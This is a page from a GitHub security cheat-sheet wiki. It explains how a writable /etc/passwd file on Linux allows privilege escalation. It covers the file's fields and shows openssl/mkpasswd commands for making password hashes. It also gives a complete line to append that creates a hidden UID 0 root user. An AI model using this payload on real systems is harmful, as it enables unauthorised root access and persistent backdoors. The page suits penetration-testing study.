exploiting writeable etc passwd - dvanmosselbeen/security-cheat-sheet GitHub Wiki

Exploiting writeable /etc/passwd

Table of Contents

Introduction

Sometimes, depending on the context, the vulnerability we discover, we can get access to the /etc/passwd file. Of course, by default the /etc/passwd file is not writeable by normal user, and you need to have super privileges. However, due some other vulnerability, escalating to root user somehow, can give you the opportunity to write to the /etc/passwd file.

Understanding /etc/passwd

The /etc/passwd file stores essential information, which is required during login. In other words, it stores user account information. The /etc/passwd is a plain text file. It contains a list of the system’s accounts, giving for each account some useful information like user ID, group ID, home directory, shell, and more.

The /etc/passwd file should have general read permission as many command utilities use it to map user IDs to user names. However, write access to the /etc/passwd must only limit for the superuser/root account. When it doesn't, or a user has erroneously been added to a write-allowed group. We have a vulnerability that can allow the creation of a root user that we can access.

Understanding /etc/passwd format

The /etc/passwd file contains one entry per line for each user (user account) of the system. All fields are separated by a colon : symbol. Total of seven fields as follows. Generally, /etc/passwd file entry looks as follows:

test:x:0:0:root:/root:/bin/bash

As divided by colon (:)

  1. Username: It is used when user logs in. It should be between 1 and 32 characters in length.
  2. Password: An x character indicates that encrypted password is stored in /etc/shadow file. Please note that you need to use the passwd command to compute the hash of a password typed at the CLI or to store/update the hash of the password in /etc/shadow file, in this case, the password hash is stored as an "x".
  3. User ID (UID): Each user must be assigned a user ID (UID). UID 0 (zero) is reserved for root and UIDs 1-99 are reserved for other predefined accounts. Further UID 100-999 are reserved by system for administrative and system accounts/groups.
  4. Group ID (GID): The primary group ID (stored in /etc/group file)
  5. User ID Info: The comment field. It allow you to add extra information about the users such as user’s full name, phone number etc. This field use by finger command.
  6. Home directory: The absolute path to the directory the user will be in when they log in. If this directory does not exists then users directory becomes /
  7. Command/shell: The absolute path of a command or shell (/bin/bash). Typically, this is a shell. Please note that it does not have to be a shell.

How to exploit a writable /etc/passwd

It's simple really, if we have a writable /etc/passwd file, we can write a new line entry according to the above formula and create a new user! We add the password hash of our choice, and set the UID, GID and shell to root. Allowing us to log in as our own root user!

Generate a linux password

Syntax is as following:

$ openssl passwd -1 -salt <SALTNAME> <PASSWORD>

For example:

$ openssl passwd -1 -salt mysalt password123
$1$mysalt$hREc3A9Q3vWq/TYxhRgW80

Or:

$ openssl passwd newpasswordhere
Warning: truncating password to 8 characters
xCGsLUSejS.No

Or with:

$ mkpasswd -m sha-512 newpasswordhere

Modifying the /etc/passwd

In the context that we have write access to /etc/passwd add the following to that file to create a new user named mynewuser:

mynewuser:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash

Historically, the /etc/passwd file contained user password hashes, and some versions of Linux will still allow password hashes to be stored there.

Resources

⚠️ **GitHub.com Fallback** ⚠️